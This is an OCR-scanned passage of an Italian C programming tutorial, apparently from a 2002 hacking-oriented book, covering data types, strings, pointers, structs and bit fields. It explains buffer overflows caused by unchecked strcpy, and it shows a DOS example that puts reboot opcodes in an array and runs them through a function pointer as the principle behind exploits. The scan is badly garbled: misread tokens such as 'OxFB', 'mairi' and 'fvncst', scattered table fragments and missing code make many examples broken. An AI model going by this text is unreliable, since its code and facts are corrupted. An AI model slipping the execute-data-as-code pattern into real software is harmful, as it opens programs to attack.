Int a = 12 = 000 Oli 00 byte 0001 



byte 0002 



Per questo motivo in questi casi non lasciatevi portare fuori dalla presenza di un tipo char in 
quanto questo è solo ideale per memorizare un carattere, in quanto questo è rappresentato 
da un valore ASCII compreso tra 0 e 255, ma ricordatevi sempre che in linguaggio C non 
esiste differenza tra un carattere ed un numero come magari in altri linguaggi come il basic 
esiste. 

In C esistono altri tipi numerici che servono a mantenere i numeri memorizzati con il formato 
in virgola mobile. 
Si tratta de tipi : 

float 
doublé 

Mentre nei tipi di prima i valori potevano essere solo interi qui, grazie al formato di 
memorizzazione, possono essere anche con la virgola come ad esempio 6,899 oppure 2E3 in 
esponenziale. 

Prima di vedere altri concetti legati alla dichiarazione delle variabili è necessario fare ancora 
un precisazione sui valori d prima. 

Abbiamo detto che i valori sono compresi tra un valore negativo ed uno positivo. 

In Linguaggio C esiste la specifica che è possibile mettere prima del tipo per dire al sistema 

che il valore è da considerare senza segno. 

In pratica abbiamo detto che il valore poteva essere visto come il numero di bytes destinati al 
tipo. 

Questo è solo parzialmente preciso in quanto per il valore vengono usati tutti i BITS meno 
uno che di fatto viene usato per il segno. 

In altre parole ad esempio il tipo int possiede 15 bits per il valore e quindi può rappresentare 
32768 numeri e un bit per il segno (+-). 

Volendo usare anche questo bit per I valore è possibile usare prima del tipo la specifica 
unsigned. 

Ad esempio un variabile : 
unsigned int a 



può memorizzare valori da 0 a 65536, tutti come valori positivi. 
In questo caso i valori assegnabili diventano i seguenti. 



unsigned char 


da 0 


a 


255 


unsigned int 


da 0 


a 


65535 


unsigned short 


da 0 


a 


65535 


unsigned long 


da 0 


a 


4294967295 



0000 
1100 
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Se nei nostri programmi dobbiamo fare uso di numeri frazionari abbiamo a disposizione due 
tipi di variabili in virgola mobile e precisamente il float e il doublé. 
L'occupazione in byte e il valore assegnabile a ciscun tipo sono precisamente : 



float - 4 bytes da +- 1.701411E-38 



+- 1.701411E38 



A questo punto vi ce abbiamo svito solo valori numeri ci vi chiederete come è possibile 
memorizzare delle stringhe intese come sequenze di caratteri ASCII. 

Abbiamo detto prima che un carattere in C non è diverso da un numero tanto che possiamo 
anche fare delle cose del tipo : 



int 


a, b, c; 


// Tre variabili intere 




a = 
b = 


25; 
'B'; 


// Ad a viene assegnato 
// b viene asegnato con 


25 

65 ovvero il codice numerico ASCII di B 


c = 


b - a; 


// c vale 40 ovvero X B' 


- 25 (65-25) 



Mediante il concetto di array possiamo memorizzare delle squenze di valori per cui anche di 
caratteri. 

La dichiarazione di array avviene mediante l'uso delle parentesi quadre. 



significa che a è una sequenza di 20 interi numerati da 0 a 1 9. 
Per questo motivo possiamo fare : 



char a [20] = "Stringa"; 



a[0] 
a[l] 



Molti linguaggi come il Basic trattano come oggetti le stringhe. 

Il Linguaggio C non lo fa per cui anche funzioni semplici come la manipolazione di stringhe, 
copia, comprazione, concatenazione, vengono svolte da algoritmi. 
Il basic permette ad esempio l'assegnazione tra dure variabili con : 

a$ = "Stringa"; 



Il C dovrebbe eseguire un algoritmo del tipo : 



inizializza un variabile d'indice a 0 
segna qui l'inizio 

prendi l'elemento indicato dalla variabile indice dentro all'array a 
guarda se è l'ultimo carattere 

se non lo è copialo dentro alla posizione indice di b , incrementa la variabile indice e vai 

all'inizio 

se no finisci 



Avete visto la domanda 'è l'ultimo carattere dell'array ?' ? 

In C è necessario inserire alla fine delle sequenze di caratteri uno particolare che indica la 
fine della stringa. 

Normalmente questo è il valore NULL ovvero lo 0. 

In pratica il numero di caratteri necessari in un array destinato a memorizzare delle stringhe è 
sempre più grande di 1 carattere destinato al fine stringa. 
Una stringa del tipo : 



"ABCD 
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non è lunga 4 caratteri ma bensì 5 in quanto in realtà la stringa è : 
"ABCDO" 

Fate attenzione in quanto l'inizializzazione diretta mette automaticamente il valore 0 alla fine. 
Nel caso di dichiarazione di questo tipo, ovvero senza specificare la dimensione dell'array, il 
sistema autodimensiona l'array stesso alla lunghezza dels tringa + 1 carattere. 



Char a[] = "ABCD" 



Sarebbe come dire : 



Dimensionare con 



char a[20] = "ABCD" 



significa riservare in memoria per la variabile a 20 bytes ma sul momento inseirgli solo 5 
caratteri. 

Dicevamo che il Linguaggio C non possiede istruzioni per la manipolazione di stringhe. 
Queste sono implementate nelle librerie normalmente distribuite con il Linguaggio come 
normali funzioni. 

Ad esempio dentro a queste librerie ci troviamo funzioni come strcpy (copia una stringa) 
strcmp (compara una stringa con un'altra), strcat (concatena due stringe). 
L'assegnazione come abbiamo visto mette automaticamente il carattere di fine stringa. 
Fate attenzione che magari in altri vasi sarà vostro compito mettere lo zero come terminatore. 
Dimenticandosi di questo poterete bloccare l'esecuzione del programma in quanto l'algoritmo 
di copia aspettandosi di trovare il fine stringa continuerebbe al'infinito a copiare da una parte 
all'altra i valori. 

Non abbiamo ancora parlato delle istruzioni ma essendo queste semplici vi voglio fare vedere 
come funziona una copia di una stringa. 

char a[] = "ABCD"; 
char b[10]; 
int indice = 0; 
while (a [indice} != 0) 



Non trovando lo 0 il while non terminerebbe mai. 

Ricordatevi che il C non esegue controllo di valori per cui se avessimo : 

char a [2]; 



e poi copiassimo "ABCD" dentro ad a[] andremmo a finire con i caratteri in più dentro alla 
variabile dopo. 

Infatti quello che capita è esattamente quello che capiterebbe in assembler con due variabili 
vicine in memoria. 

L'utilizzo di ulteriori parentesi permetterebbe di definire delle matrici bidimensionali o anche a 
più dimensioni. 

Ad esempio è possibile dichiarare variabili del tipo : 
char m[10] [5] ; 

Detto in breve sarebbe come dire N righe di M colonne. 

Prima di andare avanti ricordatevi sempre che le variabili qualsiasi esse siano sono sempre 
posizionate in memoria e quindi anche se di fatto l'indirizzo a cui si trovano noi lo possiamo 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



quasi sempre ignorare questo c'e' e dichiarare una variabile significa richiedere al compilatore 
di riservare per questa un certo numero di BYTES a partire da questo indirizzo di partenza. 
Ricordatevi RISERVARE !!! 

Altri linguaggi come il BASIC dopo aver riservato lo spazio controllano anche quello che si 

mette al suo interno avvisando se il contenuto non è idoneo per quella variabile. 

Il C non lo fa e quindi a causa di errori di sottodimensionamento possono capitare errori che 

poi in fase di esecuzione diventano incomprensibili. 

Facciamo un esempio che spesso capita al novizio. 

Questo errore è quello legato al fatto di ignorare spesso il carattere di fine stringa e quindi di 
dimensionare la variabile solo per il numero di caratteri. 

Dicevamo prima che lo STRING COPY (strcpy) è una funzione che si trova nella libreria 
standard del C che serve a copiare ogni singolo carattere di un array dentro ad un altro. 
Come avevamo schematizzato prima l'algoritmo controllerebbe ogni carattere del primo array 
al fine di vedere se si è raggiunto il carattere di fine stringa ('\0' o NULL). 
Ora facciamo questa ipotesi : 

char m[4] ; 
int x; 

Ora se volessimo vedere in memoria come probabilmente verrebbero allocati gli oggetti 
avremmo : 



BYTE 1 di m ovvero m[0] 
BYTE 2 di m ovvero m[1] 
BYTE 3 di m ovvero m[2] 
BYTE 4 di m ovvero m[3] 
BYTE 1 di x 
BYTE 2 di x 



Ora se facessimo : 
strcpy(m, "ABCDE") 

il compilatore non ci darebbe errore in quanto la funzione direbbe : 
COPIA "ABCDE" a partire dal primo indirizzo di dove si rova m. 

Il carattere 'E' andrebbe afinire nel primo BYTE della variabile x mentre il carattere di fine 
stringa verrebbe messo nel secondo BYTE della variabile x. 
Ora se noi dichiarassimo : 

char k[10]; 

e poi usassimo la funzione per la copia di stringhe con : 

E anche qui nessun problema in quanto l'agoritmo di strcpy prenderebbe il primo carattere di 
m, confronterebbe per vedere se è il fine stringa, non essendolo lo copierebbe nel primo byte 
di k, incrementerebbe la variabile d'indice usata per accedere ad ogni singolo byte dell'array e 
continuerebbe fino a trovare il carattere di fine stringa e di fatto lo troverebbe a m[5]. 
Lo so che noi non lo abbiamo dichiarato con cosi tanti bytes ma il Linguaggio C usando un 
ottica a basso livello ragiona solo usando gli indirizzi per cui dire 



sarebbe come dire 

l'indirizzo di m + il numero d'indice moltiplicato la dimensione del tipo. 

Essendo il tipo char e quindi di dimensione 1 byte sarebbe come dire &m[0] + (5*1 ) 

Avete visto il carattere & ? 
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In C significa 'l'indirizzo di' per cui in questo caso sarebbe come dire l'indirizzo di m[0]. 
Comunque tornando al caso di prima dicevamo che fino a questo punto non c'era nessun 
problema in quanto ci troveremmo con : 



D_ 
E_ 

\0 



BYTE 1 di m ovvero m[0] 
BYTE 2 di m ovvero m[1] 
BYTE 3 di m ovvero m[2] 
BYTE 4 di m ovvero m[3] 
BYTE 1 di x 
BYTE 2 di x 



Ora se aggiungessimo l'istruzione : 



Cosa andremmo a fare ? 

Semplice metteremmo dentro alla variabile x il valore 25 il quale però andrebbe a 
soprascrivere gli ultimi due caratteri dell'array. 
Se dopo aver fatto questo usassimo nuovamente : 

strcpy(k,m) 

probabilmente ci troveremmo con il programma in crash in quanto l'algoritmo di strcpy non 
trovando più il carattere di fine stringa continuerebbe a copiare dentro alla zona di memoria di 
k correndo il rischio di arrivare a sconfinare in zone di memoria con contenuti critici. 
Ricordatevi quindi di valutare sempre le dimensioni delle variabili in quanto il C non svolge 
nessun controllo ma eseguirebbe solo al funzione di definizione e basta. 
Questa caratteristica del linguaggio C è la base di quelli che nell'hacking viene definita con il 
termine di buffer overflow. 

In altre parole il programmatore che dimensiona un array adatto ad accettare una determinata 
variabile proveniente da un input dall'esterno dovrebbe di norma controllare la lunghezza del 
valore assegnato in quanto questa possibilità di sconfinare all'interno di zone di memoria 
relative ad altri oggetti potrebbe permettere l'inserimento di parti di codice pericoloso. 
Il linguaggio C come d'altra parte l'assembler e tutti i linguaggi a basso livello permettono di 
fare delle cose abbastanza strane. 

Anni fa scrissi un esempio in cui veniva mostrato come di fatto era possibile inserire dentro a 
degli array numerici dei valori relativi a codici operativi di istruzioni assembler e 
successivamente eseguirle esattamente come se di fatto fossero del codice del programma. 
Questo principio è quello che è alla base di questo tipo di exploit dei quali discuteremo 
nell'apposito capitolo. 

L'esempio era interessante perché in genere le teorie della programmazione affermano che 
un programma è composto da alcuni segmenti in cui sono presenti parti specifiche come ad 
esempio quella relativa al codice che è inserita dentro al CODE SEGMENT, quella dei dati 
che è invece nei DATA SEGMENT e cosi via. 

La dichiarazione di un array crea un zona di memoria dentro ad un segmento dati per cui i 
valori inseriti dentro all'array stesso vanno a finire all'interno di questo. 
Il codice che scrissi partiva da questo presupposto. 

In pratica scrivevi un piccolo programma possibilmente in formato .COM e mediante un 
DEBUG facevi scrivere su disco i codici esadecimali relativi alle istruzioni assembler. 
Questi codici operativi, detti OPCODE, venivano inseriti all'interno di un array di numeri 
dichiarato dentro ad un programma scritto in Linguaggio C. 

L'esempio prendeva il codice di un programmino ce eseguiva il BOOT della macchina. 
Dopo aver dichiarato l'array e inserito i codici operativi dentro a questo mediante un cast, o 
forzatura, del linguaggio C l'indirizzo dell'array veniva assegnato a un puntatore a funzione. 
Chiaramente richiamando questo puntatore l'esecuzione saltava all'indirizzo appena 
assegnato dentro al quale iniziava il codice espresso direttamente come codici operativi e 
quindi questo veniva eseguito. 

La comprensione del meccanismo di questo piccolo esempio è essenziale per la 
comprensione del tipo di exploits a cui abbiamo accennato. 
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unsigned char far array[] = { 





/* 


[CODICE 


DI BOOT.COM] 


*/ 


OxFB, 0x31 , OxDB, 


/* 


FB 


STI 




*/ 


0x8E, OxDB, OxBB, 


/* 


31DB 


XOR 


BX,BX 


*/ 


0x72, 0x04, 0xB8, 


/* 


8EDB 


MOV 


DS,BX 


*/ 


0x34, 0x12, 0x89, 


/* 


BB7204 


MOV 


BX, 0472 


*/ 


0x07, OxEA, 0x00, 


/* 


B83412 


MOV 


AX, 1234 


*/ 


0x00, OxFF, OxFF 


/* 


8907 


MOV 


[BX] , AX 


*/ 




/* 


EAOOOOFFFF 


JMP 


FFFF-.0000 


*/ 




/* 








*/ 



}; 

void mairi (void) 
{ 

void (far *funct) () = (void(far *)()) array; 
(* fvncst) (); 

ì 



U ottica ad indirizzi del Linguaggio C è la caratteristica che lo avvicina di più ai linguaggi a 
basso livello. 

Per poter gestire questa filosofia degli indirizzi il Linguaggio C possiede un tipo aggiuntivo 
ovvero il tipo puntatore. 
Che cosa è questo tipo ? 
Bene. 

Un tipo int, ad esempio, serve a dichiarare una variabile il cui contenuto è idoneo a contenere 

un valore numerico compreso tra -32767 e +32768. 

Il tipo puntatore è il tipo idoneo a contenere un indirizzo di un oggetto. 

La sua dichiarazione aviene con l'operatore unario * ovvero : 

char *p; 

Sarebbe come dire che p è idoneo a contenere l'indirizzo di un char. 
Oppure : 

int *p; 

p è idoneo a contenere un indirizzo di un tipo intero. 

Dopo aver dichiarato un tipo intero fate attenzione che il valore a cui punta non esiste fino a 
quando voi non gli assegnate un valore. 
In pratica se fate : 



è come se diceste che c può contenere un indirizzo ma fno a questo punto non avete detto 
quale quindi lo spazio risulta non assegnato. 
Successivamente facendo : 

c = &m[0]; 

direste che lo spazio riservato all'indirizzo de punatore c viene assegnato a essere quello 

dell'indirizzo del primo byte dell'array m. 

Potreste anche assegnare indirizzi direttamente con : 

char 'video = (char *) 0xB8000000L; 

In pratica all'indirizzo 0xB8000000L c'era il buffer video dei monitor a caratteri DOS. 
Questo avrebbe permesso di accedere direttamente a questa memoria. 
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Infatti i primi tempi che programmavo in GWBASIC usavo moltissimo le funzioni di PEEK e 
POKE le quali permettevano di leggere e scrivere direttamente in certe locazioni di memoria. 
Passando al C sono stato per un certo periodo che dicevo : "ma possibile che con le 2000 
fnzioni della libreria non ci siano le istruzioni di PEEK e POKE ?" 
Certo. 

A cosa servivano visto che con i puntatori potevo accedere direttamente alla memoria ? 
Dopo aver fatto la dichiarazione : 



usare p senza il simbolo * significherebbe dire l'indirizzo contenuto in p' mentre usando : 

significherebbe dire 'il contenuto dell'indirizzo in p'. 

Uno string copy usando gli indici poteva essere scritto con : 

char a[] = "ABCD" ; 
char b[5]; 
int i = 0; 

while(a[I] != ' \0' ) { 
b[I] = a[I]; 




Gli array vengono già trattati come indirizzi. 
Usare 

char a[] = "ABCD"; 

Potrebbe essere dichiarato con I puntatori come : 



Volendo usare con lo strcpy I puntatori avremmo : 

char *a = "ABCD" ; 
char *n; 
char b[5] ; 
n = &b[0]; 

while(*a .' = ' \0' ) { // Fino a quando 1' oggetto puntato da *a 

*n = *a; // L'oggetto puntato da n e' uguale a quello 

puntato d a 

++n; 

++a; // Incrementa sia n che a 

ì 

*n = *a; 

Ora però voi vi chiederete che differenza c'e' tra l'indirizzo di un intero da quello di un char. 
Nessuno, ma la dichiarazione di un certo tipo fa si che l'aritmetica dei puntatori dimensioni in 
modo corretto i valori. 
Cosa significa ? 
Prendete l'esempio : 



Ora facendo : 



++p 
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vorrebbe dire 'incrementa di 1 BYTE' l'indirizzo p . 
Questo perche' I calcolo nell'aritmetica è : 

indirizzo + N * dimensione_del_tipo 

Qundi volendo vedere in bytes rispetto all'indirizzo di partenza quanto viene spostato 
avremmo : 

int *a; 



sarebbe 

a = a + 1 * 2BYTES 

2BYTES perché la dimensione del int è 2 BYTES. 
Se avessimo : 

long *p; 

p = p + 2; 



L'errore più comune di chi inizia è quello di usare I puntatori senza prima assegnargli a quali 
indirizzi puntano. 
Se fate : 



ricordatevi adi assegnargli qualche indirizzo statico di qualche cosa definito come ad esempio 

long *p; 
long m[10]; 



In linguaggi C esistono I CAST ovvero le forzature che permettono di assegnare oggetti di tipi 
differenti a certi altri. 

La forzatura permette di fare in modo che l'oggetto utilizzi poi le proprietà dell'oggetto 
assegnato. 

Ad esempio è possibile fare : 




In ogni caso no demoralizzatevi se non capite bene l'uso dei puntatori in quanto all'inizio 
potrete anche ignorarli. 

Sicuramente il loro utilizzo permette di raggiungere prestazioni che solo linguaggi come il C o 
l'assembler possono avere, ma come abbiamo detto il loro uso potrà essere eseguito in un 
secondo tempo, quando sarete più ferrati sul linguaggio. 

Per quanto riguarda gli indirizzi per ora ricordatevi solo che gli array senza specifica del 

singolo elemento sono considerati indirizzi. 

Coma abbiamo già detto dopo avere fatto la dichiarazione : 
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scrivere a oppure &a[0] è la stessa cosa. 
In altre parole specificare 



sarebbe come dire l'indirizzo di dove si trova l'array a, e quindi essendo a[0] il primo elemento 
dell'array lo stesso indirizzo lo si può avere dicendo &a[0]. 

In questa parte abbiamo accennato alla dichiarazione delle variabili ovvero di quella parte di 
lavoro che avviene nella parte dichiarativa della programmazione. 
In questa si osservano i problemi, reali od astratti che siano, e si ricavano tutti i dati che 
possono esserci utili per raggiungere uno scopo. 

Se dovessimo, ad esempio, creare un programma per memorizzare i dati di qualche cliente 
potremmo fare : 

char nome [40] ; 
char cognome [40] ; 
char indirizzo [40] ; 

Ora all'interno di un programma potremmo avere moli di dati anche notevolmente grandi per 
cui potremmo trovarci ad avere la necessità di incapsularli al fine di definire a chi 
appartengono questi. 

Il linguaggio C permette la definizione di quella che è la struttura. 

Questa altro non è che un contenitore virtuale, identificato da un nome, il quale può essere 
successivamente utilizzato per dichiarare delle variabili le quali conterranno tutti i campi 
inseriti in fase di definizione. 

Nell'esempio di prima i dati erano relativi ad un cliente per cui, utilizzando il concetto di 
struttura, avremmo potuto fare : 

struct clienti { 

char nome [40] ; 
char cognome [40] ; 
char indirizzo [40] ; 

Fate attenzione che fare quello che abbiamo appena fatto non significa occupare uno spazio 
in memoria. 

Questo verrà invece allocato quando useremo questa struttura per dichiarare una variabile. 
struct clienti varCli; 

varCli sarà allocata in memoria e occuperà esattamente la somma dei campi dichiarati dentro 
alla struttura stessa. 

L'accesso ai campi avviene utilizzando il PUNTO ( . ) nel seguente modo : 

varCli . nome 
varCli . cognome 
varCli . indirizzo 

Capite che si potrebbe in questo modo dichiarare più varabili o addirittura array di strutture. 
Anche per le strutture vale il discorso dei punatori. 
Ad esempio potremmo dichiarare : 



Quanto spazio occuperebbe una dichiarazione di questo tipo ? 

Esattamente quello che occuperebbe un indirizzo ovvero in genere o 2 BYTES o 4 BYTES. 
Abbiamo detto appena poco prima che l'accesso ai membri avviene tramite i punti (.). 
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Nel caso in cui l'accesso sia a membri tramite puntatori a strutture, il tutto avviene inserendo i 
simboli -> tra il nome del puntatore e quello dei membri. 

varCli ->nome; 
varCli->cognome; 

Ricordatevi sempre che dichiarare un puntatore non significa allocare lo spazio per il tipo a 
cui punta ma solo lo spazio che conterrà quell'indirizzo. 

Fino ad ora vi ho solo mostrato come è possibile dichiarare un puntatore e poi assegnarlo 
all'indirizzo di una variabile dichiarata da qualche altra parte. 

In ogni caso questo non è l'unico mezzo per assegnare un spazio di memoria riservato ad un 
puntatore in quanto esistono dei casi in cui non essendo possibile a priori di sapere quanta 
memoria si deve allocare, si esegue l'allocazione dinamica tramite funzioni presenti dentro 
alle librerie del linguaggio C. 

Non discuteremo di queste in quanto non sarebbe sufficiente lo spazio di questo volumetto, 
ma solo per farvi un esempio se noi sappiamo fin dall'inizio che un buffer potrà essere , ad 
esempio, 5000 bytes, potremo fare: 

char buffer [5000] ; 




oppure se preferite : 
p = Sbuffer [0]; 
che è la stessa cosa. 

Non sapendo la dimensione inizialmente potremo fare, al momento in cui veniamo a 
conoscenza di questa : 

char *p; 



In pratica la funzione malloc allocherebbe in memoria il numero di bytes specificato, 
restituirebbe l'indirizzo di dove si trova il primo byte il quale verrebbe assegnato al puntatore. 
Una cosa su cui vale la pena soffermarsi sono i cast di cui avevamo detto prima qualche 
cosa. 

In pratica un certo tipo possiede tutte le proprietà di questo ed in particolar modo quando si 
parla di indirizzi. 

Prima di vedere ancora l'uso dei cast sugli indirizzi vediamoli utilizzati su tipologie normali. 
Facciamo un esempio : 

long n; 
Int p = 20; 

Volendo assegnare il valore in p ad n potremmo forzare l'intero ad essere vistto come un long 
facendo : 

m = donz) p; 

In questo caso non capiterebbe nulla in quanto il long di destinazione è più grande dell'intero, 
come numero di bytes, per cui l'intero contenuto verrebbe inserito dentro alla variabile di 
destinazione. 

Può capitare anche il caso contrario ovvero quello in cui un valore contenuto dentro ad una 
variabile maggiore viene inserito dentro ad una più piccola. 

long m = 300000L; 
Int a; 
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a = (int) m; 

In questo caso il contenuto verrebbe troncato. 

Per capire come considerate il numero come se fosse in binario all'interno dei 4 BYTES del 
long e solo i primi 2 BYTES verrebbero assegnati alla variabile intera. 
In questi casi i cast servirebbero solo ad adattare i valori ai contenuti di altri tipi di variabli. 
Nal caso di indirizzi invece il cast è potente e permette di fare cose veramente notevoli. 
Prendiamo l'esempio di una struttura : 

struct clienti { 

char nome [40] ; 
char cognome [40] ; 
char indirizzo [40] ; 

}; 



Questo allocherebbe per la variabile p la dimensione in bytes data dalla somma dei campi 
ovvero 1 20 BYTES. 

Ora se noi volessimo accedere BYTE a BYTE potremmo fare una cosa come segue : 



char *m; 




m è un puntatore e quindi può contenere un indirizzo di un tipo char. 
&p restituisce l'indirizzo della struttura clienti p. 

il cast (char *) forzerebbe questo indirizzo a essere considerato come se di fatto fosse 
l'indirizzo di un array di char. 
In questo modo facendo : 



andremmo a mettere nel primo BYTE della struttura il carattere 'A'. 

Incrementando l'indirizzo di 1 faremmo puntare m al byte successivo. 

Una cosa che avevo tralasciato ma su cui possiamo aprire una nota veloce è quella relativa 

agli incrementi. 

Fino ad adesso per incrementare di 1 una variabile facevamo : 
a = a + 1; 



Un metodo alternativo per l'incremento unitario è quello di fare : 



La differenza tra il primo è il secondo si osserva solo nall'ambito delle priorità di operazioni 
al'interno di un'altra operazione del tipo : 



oppure 
b = ++a 

In un caso prima avviene l'assegnazione e poi l'incremento mentre nel secondo prima 
avviene l'incremento e poi l'assegnazione. 

In altri casi dove l'incremento deve essere maggiore di uno o dove l'operazione è diversa 
dall'incremento è possibile fare : 
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Concludiamo ora l'argomento dei puntatori ricordandoci di una cosa di cui dovrete sempre 
ricordarvi quando utilizzerete dei punatori. 

QUANDO DICHIARATE UN PUNTATORE CHIEDETEVI SEMPRE PRIMA DI UTILIZZARLO 
SE CONTIENE UN INDIRIZZO O SE DOVETE ANCORA ASSEGNARGLIELO MEDIANTE 
L'ASSEGNAZIONE DI UN INDIRIZZO RELATIVO AD UNA VARIABILE ALLOCATA 



Un particolare metodo relativo all'utilizzo delle strutture è legato a quelle definite con il 
termine di strutture bit fields ovvero quelle in cui i vari campi sono costituiti da uno o più bits. 
Prendiamo il caso di flags o indicatori di eventi particolari in cui utilizzare una variabile 
numerica sarebbe sciupata, anche se di fatto il loro uso non è legato all'economia di 
memoria. 

Il concetto di struttura permetterebbe di incapsulare tutti i flags al suo interno. 
Un esempio potrebbe essere : 



struct flags { 




unsigned char bit1 


1 




unsigned char bit2 


1 




unsigned char bit3 


1 




unsigned char bit4 


1 




unsigned char bit5 


1 




unsigned char bit6 


1 




unsigned char bit7 


1 




unsigned char bit8 


1 





Le variabili interne sono definite come unsigned char in quanto anche se di fatto possiamo 
trattarle a bits di fatto l'allocazione delle struttura terrà al minimo la dimensione di un unsigned 
char o comunque di un multiplo di questo. 

Chiaramente i valori dei vari mebri potranno essere rappresentati dai valori che è possibile 

usare con il numero di bits specificato. 

I numero di bits può essere anche differente da 1 bit. 

Ad esempio potrebbe essere anche valida una dichiarazione del tipo : 

struct flags { 

unsigned char bit1 : 4; 
unsigned char bit2 : 4; 

}; 

L'uso di simili strutture potrebbe essere quello di memorizzare in ogni membro un flag con il 
fine di indicare un determinato stato all'interno del programma ma nessuno ci viete di 
utilizzarlo per altri scopi. 
Ad esempio se noi dichiarassimo : 



Questo allocherebbe in memoria da qualche parte lo spazio relativo ad un unsigned char 
ovvero 1 BYTE. 

Se successivamente dichiarassimo un punatore : 
char 'carattere; 

avremmo dichiarato lo spazio sufficiente mantenere l'indirizzo che punta ad un tipo char. 
Ora potremmo forzare con un cast l'indirizzo della struttura ad essere accettato dal punatore. 
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Ora se assegnassimo al valore puntato dal punatore un valore, ad esempio 'A' , con 



andremmo ad inserire all'interno dell'indirizzo del puntatore carattere il valore 'A'. 

Ma questo è l'indirizzo di dove è stata allocata la struttura per cui di fatto se riprendessimo ad 

usare la struttura per se stessa potremmo andare a vedere i singoli bits del byte occupato con 



strBits.bitl 
strBits.bit2 

strBits.bitn 

Il codice ASCII di 'A' è 65 per cui dentro al BYTE puntato da carattere avremo : 




Infatti facendo un piccolo programmino che stampa il contenuto di ogni singolo campo della 
struttura avremmo la stampa a video del valore in formato binario : 

^include <stdio.h> 



struct flags { 








unsigned 


char 


bitl : 


■ l; 


unsigned 


char 


bit2 : 


■ i; 


unsigned 


char 


bit3 ; 


■ 1; 


unsigned 


char 


bit4 . 


■ 1; 


unsigned 


char 


bit5 ; 


■ 1; 


unsigned 


char 


bit 6 . 


■ i; 


unsigned 


char 


bitl : 


■ 1; 


unsigned 


char 


bit8 ; 


■ 1; 



}; 



struct flags strBits; 

char *carattere; 

void main (void) 
{ 

carattere = (char *) SstrBits; 

*carattere = 'A'; 

printf ( " \n%d%d%d%d%d%d%d%d ", 

strBits .bit8, strBits .bitl, strBits .bit 6, strBits .bit5, 
strBits. bit4, strBits .bit3, strBits .bit2 , strBits.bitl); 

} 

Ora provate solo ad assegnare 1 un bit della struttura che prima era 0, ad esempio il bit 2 e 
poi riprovate stampare solo il valore puntato da carattere : 

strBits.bit2 = 1 ; 



Avremmo quindi : 




Che in decimale equivale a 67 ovvero al carattere 'C 
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Inserite in coda al programma, dopo l'assegnazione di prima : 
printf("%c", 'carattere); 
Avrete C stampato a video. 

Prima di poter parlare dell'altra specifica della dichiarazione, la classe d memoria, dobbiamo 
vedere la seconda parte di una programma ovvero la parte algoritmica. 
Abbiamo detto che un programma si suddivide in due parti ovvero la parte dichiarativa e 
quella algoritmica. 

Nella seconda parte grazie a istruzioni , intese come parole chiave del linguaggio, è possibile 
creare i flussi di esecuzione in cui le istruzioni eseguite sono a seguito di valutazioni fatte 
mano mano. 

Le parole chiave del C sono : 



int 


char 


float 


doublé 


struct 


union 


long 


short 


unsigned 


auto 


extern 


register 


typedef 


static 


goto 


return 


sizeof 


break 


continue 


if 


else 


for 




while 



Fino ad adesso abbiamo osservato i problemi e abbiamo definito i dati che utilizzeremo 
dentro al programma. 

A questo punto dobbiamo iniziare a vedere quella parte in cui si scrive il codice necessario a 
manipolare i dati per ottenere quello che ci prefiggiamo di fare. 

Questa parte viene svolta dalla parte algoritmica dove usando semplici assegnazioni o 
funzioni delle librerie del linguaggio C manipoleremo i dati e li visualizzeremo a video, li 
scriveremo su files, creeremo dei rapporti di stampa o comunque faremo tutto quello che è 
necessario. 

Il linguaggio C possiede poche parole chiave che sono quelle che abbiamo appena visto. 
In ogni caso la fase di creazione di un programma eseguibile si suddivide in due parti ovvero 
nella compilazione, dove avviene un analisi sintattica e semantica e quind una traduzione in 
un codice oggetto e successivamente nel link ovvero quella fase in cui questo codice oggetto 
viene analizzato e tutti i riferimenti simbolici vengono tradotti in riferimenti assoluti. 
Cosa significa questo ? 

Beh., semplicemente che come abbiamo visto noi per riferirci, ad esempio, ad una variabile 
usiamo un nome ben definito che ci ricorda dello scopo di questa. 

In altre parole noi usiamo nomi di variabili come nominativo, indirizzo ecc. ma poi in effetti a 
livelo di codice assemblativo i riferimenti verranno fatti solo per indirizzi. 
Il link non solo esegue questa conversione ma unisce al nostro programma quel codice 
relativo alle funzioni di libreria che noi abbiamo utilizzato e che come codice sono presenti i 
files distribuiti con il compilatore. 

Dicevamo che il Linguaggio C non tratta le stringhe ma che comunque, essendo un problema 
comune quello di manipolarle, all'interno di una libreria sono presenti tutte quelle funzioni 
adatte a svolgere questi compiti. 

Non sarà quindi necessari scriverle ogni volta e vi assicuro che di funzioni ce ne sono fin 
quante ne volete. 

Il segreto per imparare ad usarle è quello di mettersi a mente il compito che si vuole fare e di 
cercare nei gruppi funzionali delle descrizioni quelle funzioni che si adattano meglio a quel 
compito. 

Esistono funzioni per la gestione della memoria, per la gestione dell' I/O, per la manipolazione 
di stringhe ecc. ecc. 

Quindi da questo darebbe già possibile comprendere che il C è un linguaggio funzionale o 
procedurale. 
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Che cosa significa ? 

Semplicemente che le varie istruzioni possono essere incapsulate all'interno di moduli 
chiamate funzioni le quali possiedono un nome che gli permette di essere richiamate in 
qualsiasi punto del programma. 

I primi linguaggi di programmazione identificavano con un numero di linea ogni istruzione e 
poi in base a dei controlli fatti sui valori delle variabili si eseguivano dei salti a determinati 
punti. 

Questi tipi di salti potevano essere condizionati od incondizionati, ovvero il linguaggio nel 
primo caso prima di eseguire il salto si memorizzava il punto di partenza in modo tale che a 
seguito di una certa istruzione di ritorno questo veniva ripristinato. 

Chiaramente questo metodo di programmazione era confusionario in quanto era 
complesso tenere a mente a quali scopi erano state scritte determinati gruppi di istruzioni. 
La creazione del concetto di funzione ha permesso di includere dentro a dei limiti definiti le 
funzioni indirizzate allo svolgimento di un certo compito. 
La dichiarazione di una funzione avviene con : 



L'inizio e la fine del blocco contenente le istruzioni relative ad una determinata funzione è 
contrassegnato dalla parentesi graffa aperta e chiusa. 
Ad esempio : 

int funzione(int argomento) 
{ 

int a; 

a = a + 1 ; 




La classe di memoria l'avevamo tralasciata prima con le variabili e la saltiamo anche adesso 
riproponendoci di parlarne dopo. 

Una funzione può ricevere un certo numero di variabili come argomenti e restituire un valore 
di ritorno. 

Ad esempio è una dichiarazione di funzione valida : 
void funzione(int valore) 

Questo dice che la funzione non restituisce nulla (void) e che riceve in ingresso una variabile 
intera. 

Quando si parla di analisi in relazione al fatto di identificare i problemi e di suddividerli in 

sottoproblemi al fine di rendere più semplice la sua soluzione si può vedere la stessa cosa 

nell'ambito di un programma creato e strutturato mediante l'utilizzo di funzioni. 

Abbiamo già detto che una funzione altro non è che un blocco di istruzioni che vengono 

eseguite richiamando il nome con cui abbiamo chiamato la funzione stessa. 

Avendo la capacità di creare delle funzioni in modo tale da poter essere riutilizzate in altri 

